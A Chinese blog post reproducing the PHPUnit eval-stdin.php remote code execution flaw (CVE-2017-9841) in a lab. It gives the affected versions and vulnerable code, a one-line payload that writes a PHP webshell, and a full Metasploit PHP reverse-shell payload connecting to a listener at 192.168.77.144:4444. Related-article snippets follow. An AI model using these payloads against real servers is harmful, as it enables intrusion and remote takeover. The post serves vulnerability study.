phpunit 远程代码执行漏洞(CVE-2017-9841)

最新推荐文章于 2021-11-04 12:11:08 发布
最新推荐文章于 2021-11-04 12:11:08 发布
阅读量2.5k 收藏 1
点赞数
文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43718688/article/details/115970941
版权

phpunit 远程代码执行漏洞(CVE-2017-9841)

漏洞概述:

PHPUnit 是 PHP 程式语言中最常见的单元测试 (unit testing) 框架,通常phpunit使用composer非常流行的PHP依赖管理器进行部署,将会在当前目录创建一个vendor文件夹.phpunit生产环境中仍然安装了它,如果该编写器模块存在于Web可访问目录,则存在远程代码执行漏洞。

漏洞版本:

4.8.19 ~ 4.8.27
5.0.10 ~ 5.6.2

基本原理:

漏洞位于/phpunit/src/Util/PHP/eval-stdin.php。
eval(’?>’.file_get_contents(‘php://input’));

漏洞复现:

总体来说就是向vendor/phpunit/src/Util/PHP/eval-stdin.php发送POST请求执行php代码。
例如直接执行phpinfo
在这里插入图片描述
在这里插入图片描述
用die()函数回显md5值
在这里插入图片描述
也可以直接写入一句话木马。<?=file_put_contents("1.php", '<?=eval($_REQUEST[1]);?>’);
在这里插入图片描述
但是第一次显示没有权限
在这里插入图片描述
在这里插入图片描述
给WEB目录赋予权限之后可以上传
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
菜刀访问第一次路径写错了提示404,第二次提示200但是报错,网上说可能是linux和Windows编码不兼容,或是PHP版本问题,目前还没解决。
在这里插入图片描述
在这里插入图片描述
在浏览器访问webshell地址,访问不到
在这里插入图片描述
第二次用msf生成PHP木马,查看木马的内容

/*<?php /**/ error_reporting(0); $ip = '192.168.77.144'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

在这里插入图片描述
用之前的方法将木马的内容粘贴到XX的位置:

<?=file_put_contents("1.php", 'XX'); ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210421185205472.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzcxODY4OA==,size_16,color_FFFFFF,t_70) 然后发包,可以看到下图回显 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210421185214637.png) 在kali机里面监听获取shell ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210421185222775.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzcxODY4OA==,size_16,color_FFFFFF,t_70)
沾了油的水子
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2017-9841 phpunit 远程代码执行漏洞
weixin_51387754的博客
12-09 1787
漏洞简介 composer是php包管理工具,使用composer安装扩展包将会在当前目录创建一个vendor文件夹,并将所有文件放在其中。通常这个目录需要放在web目录外,使用户不能直接访问。 phpunitphp中的单元测试工具,其4.8.19 ~ 4.8.27和5.0.10 ~ 5.6.2版本的vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php文件有如下代码eval('?>'.file_get_contents('php://input')
【威胁分析】phpunit远程代码执行漏洞
sinat_35058227的博客
08-29 3062
phpunitphp中的单元测试工具 其4.8.19 ~ 4.8.27和5.0.10 ~ 5.6.2版本的: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 有一个eval eval('?>'.file_get_contents('php://input')); 直接将PHP代码作为POST Body发送 即可执行php代码 威胁分析: 1、分析是否利用该漏洞 uri为:/vendor/phpunit/phpunit/src/Util/PHP
PHPUnit远程代码执行漏洞 CVE-2017-9841 漏洞复现
ADummy的博客
02-27 2760
PHPUnit远程执行代码CVE-2017-9841) by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>命令执行 0x01漏洞介绍 PHPUnit是面向程序员的PHP测试框架。 Util/PHP/eval-stdin.php在4.8.28之前的PHPUnit和5.6.3之前的5.x中允许远程攻击者通过以<?php子字符串开头的HTTP POST数据执行任意PHP代码,如对具有暴露的/ vendor文件夹的站点的攻击(即外部访问)所证明的到/vendor/phpuni
phpunit 远程代码执行漏洞CVE-2017-9841)复现
热门推荐
SoulCat
05-28 2万+
phpunit 远程代码执行漏洞CVE-2017-9841)复现 上海虹桥机场有这么一个故事,一对恋人在机场分手,女对男说“你别等我了,我们不会有结果,就像机场永远等不来火车,我们以后也不会有交集”。没过几年,虹桥机场跟火车站连在了一起,设计这个工程的总工程师就是那个男的,只要有爱就有办法,任何人都可以无止境的对一个人好,但是前提是值得。 漏洞概述: PHPUnitPHP 程式语言中...
phpunit 远程代码执行 (CVE-2017-9841)
YouthBelief的博客
11-04 2719
@[TOC](phpunit 远程代码执行 (CVE-2017-9841)) phpunit 远程代码执行 (CVE-2017-9841) PHPUnitPHP 程式语言中最常见的单元测试 (unit testing) 框架。 0x01 漏洞描述 通常phpunit使用composer非常流行的PHP依赖管理器进行部署,将会在当前目录创建一个vendor文件夹.phpunit生产环境中仍然安装了它,如果该编写器模块存在于Web可访问目录,则存在远程代码执行漏洞。 80端口 漏洞位于 /vendor/p
phpunit-parallel:PHPUnit并发测试执行
05-09
放弃-phpunit-parallel 另一个PHPUnit并发测试执行器 我不再维护该项目,它仅在这里作为存档。 另一种方法是,检查出 它是如何工作的? phpunit-parallel使用基于react-php的even循环与许多辅助进程进行通信。 它...
phpunit-github-actions-printer
04-15
phpunit-github-actions-printer 在有一种零配置方式来实现这一这是一台PHPUnit打印机,使用GitHub Actions的::error和::warning功能为失败的测试运行添加注释。 与上述内容的主要区别在于,它支持添加除错误之外的...
phpunit-5.7.27
04-11
总结一下,`phpunit-5.7.27`是PHP的单元测试框架PHPUnit的一个版本,它提供了强大的工具来编写和执行测试,确保代码的质量和稳定性。了解并熟练使用PHPUnit,对于任何PHP开发者来说都是提升开发效率和代码质量的重要...
phpunit-json-assert:JSON文档PHPUnit断言
05-17
$ composer require --dev helmich/phpunit-json-assert 兼容性 该库有多个发行分支,每个分支都与PHPUnitPHP的不同发行版兼容。 下表应该提供简单的概述: “ JSON断言”版本 PHPUnit 4 PHPUnit 5 PHPUnit 6 ...
phpunit-code-quality:一旦PHPUnit测试通过,请检查代码质量
01-30
composer require --dev drawmyattention/phpunit-code-quality 将测试监听器注册到您的phpunit.xml文件: < object class = " DrawMyAttention\CodeQuality\ComplexityAnalyser " /> < bool>true ...
phpunit 远程代码执行漏洞
m0_46580995的博客
10-16 1531
phpunitphp中的单元测试工具,其4.8.19 ~ 4.8.27和5.0.10 ~ 5.6.2版本的vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 有一个eval eval('?>'.file_get_contents('php://input')); 直接将PHP代码作为POST Body发送 即可执行php代码 ...
[Vulfocus解题系列] phpunit 远程代码执行 (CVE-2017-9841)
00勇士王子的博客
07-16 858
漏洞介绍 名称: phpunit 远程代码执行 (CVE-2017-9841) 描述: PHPUnitPHP 程式语言中最常见的单元测试 (unit testing) 框架。 通常phpunit使用composer非常流行的PHP依赖管理器进行部署,将会在当前目录创建一个vendor文件夹.phpunit生产环境中仍然安装了它,如果该编写器模块存在于Web可访问目录,则存在远程代码执行漏洞漏洞版本 PHPUnit 4.8.19 ~ 4.8.27 PHPUnit 5.0.10 ~ 5.6.2 解题过
php 获取远程代码执行,Phpwind远程任意代码执行漏洞
weixin_42713608的博客
03-29 292
### 简要描述:Phpwind对于某些用户提交的参数过滤不严,导致可能的一个远程代码执行,普通前台恶意用户可以取得使用phpwind站点的权限### 详细说明:./phpwind7.2/thread.php中```InitGP(array('page','type','search','orderway','asc','special'));…… //此处省略X行$db_maxpage &amp...
ThinkPHP远程代码执行漏洞
CSD15138668634的博客
09-10 689
ThinkPHP是一个快速、简单的基于MVC和面向对象的轻量级PHP开发框架。 Thinkphp5.x版本中存在一个严重的远程代码执行漏洞。这个漏洞的主要原因是由于框架对控制器名没有进行足够的校验导致在没有开启强制路由的情况下可以构造恶意语句执行远程命令 影响范围 Thinkphp 5.1.0 - 5.1.31 Thinkphp 5.0.5 - 5.0.23 漏洞利用 环境介...
Vulfocus phpunit远程代码执行
qq_43332837的博客
08-18 441
phpunit 远程代码执行 (CVE-2017-9841) 打开靶场 访问存在漏洞的url Ip/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 抓包 改包 提交为POST数据 并添加执行phpinfo的代码 执行可得到flag
b050闲置图书分享-springboot+vue+elementui.zip(可运行源码+sql文件+文档)
最新发布
07-23
本次开发的闲置图书分享平台实现了收货地址管理、字典管理、公告管理、留言板管理、图书管理、图书收藏管理、图书评价管理、图书订单管理、用户管理、管理员管理等功能。系统用到了关系型数据库中王者MySql作为系统的数据库,有效的对数据进行安全的存储,有效的备份,对数据可靠性方面得到了保证。并且程序也具备程序需求的所有功能,使得操作性还是安全性都大大提高,让闲置图书分享平台更能从理念走到现实,确确实实的让人们提升信息处理效率。 管理图书的数据,此页面主要实现图书的增加、修改、删除、查看的功能。公告信息管理页面提供的功能操作有:新增公告,修改公告,删除公告操作。公告类型管理页面显示所有公告类型,在此页面既可以让管理员添加新的公告信息类型,也能对已有的公告类型信息执行编辑更新,失效的公告类型信息也能让管理员快速删除。
cve-2017-9841复现
07-27
根据引用\[2\]和引用\[3\]的信息,CVE-2017-9841PHPUnit远程代码执行漏洞的一个漏洞编号。PHPUnitPHP语言中最常见的单元测试框架,通常使用composer进行部署。如果在Web可访问目录中存在PHPUnit的编写器模块,就存在远程代码执行漏洞。该漏洞的版本范围是4.8.19至4.8.27和5.0.10至5.6.2。具体的原理是,在/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php文件中,通过eval函数执行了从php://input中获取的代码。然而,目前使用的PHPUnit版本一般为5.7或更高,几乎不存在这个漏洞的可能性。\[2\]\[3\] 如果您想复现CVE-2017-9841漏洞,您需要使用受影响版本的PHPUnit,并将编写器模块放置在Web可访问目录中。然后,您可以通过向php://input发送恶意代码来利用该漏洞。请注意,复现漏洞是违法行为,且可能会对系统造成损害。强烈建议您仅在合法的环境中进行安全测试和研究。 #### 引用[.reference_title] - *1* *3* [phpunit 远程代码执行漏洞CVE-2017-9841)](https://blog.csdn.net/weixin_46203060/article/details/111489023)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [phpunit 远程代码执行漏洞CVE-2017-9841)复现](https://blog.csdn.net/csacs/article/details/90640601)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值